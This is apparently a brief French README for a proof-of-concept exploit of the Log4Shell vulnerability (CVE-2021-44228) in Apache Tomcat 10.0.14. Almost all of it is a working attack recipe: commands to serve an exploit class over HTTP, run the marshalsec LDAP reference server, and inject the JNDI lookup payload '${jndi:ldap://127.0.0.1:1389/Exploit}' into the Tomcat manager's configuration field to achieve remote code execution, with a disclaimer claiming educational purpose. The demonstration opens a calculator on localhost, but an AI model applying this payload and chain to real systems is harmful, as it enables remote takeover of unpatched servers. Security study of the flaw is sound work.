
POC de vulnérabilité Log4j2 CVE-2021-44228 dans Apache Tomcat

git clone
cd apache-tomcat-10.0.14/bin
startup.bat
cd exploit
py -m http.server 8888
cd exploit
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8888/#Exploit"
Saisissez ${jndi:ldap://127.0.0.1:1389/Exploit} dans le champ 'XML Configuration file path' de l'application manager à http://localhost:8080/manager/html
La classe d'exploit est chargée et la RCE est déclenchée (l'application Calculatrice s'ouvrira)
Ce dépôt est simplement un POC réalisé à des fins éducatives. Le propriétaire du dépôt n'est pas responsable des dommages causés. En guise de note morale, ne faites pas le mal.
Exploit LDAP https://github.com/mbechler/marshalsec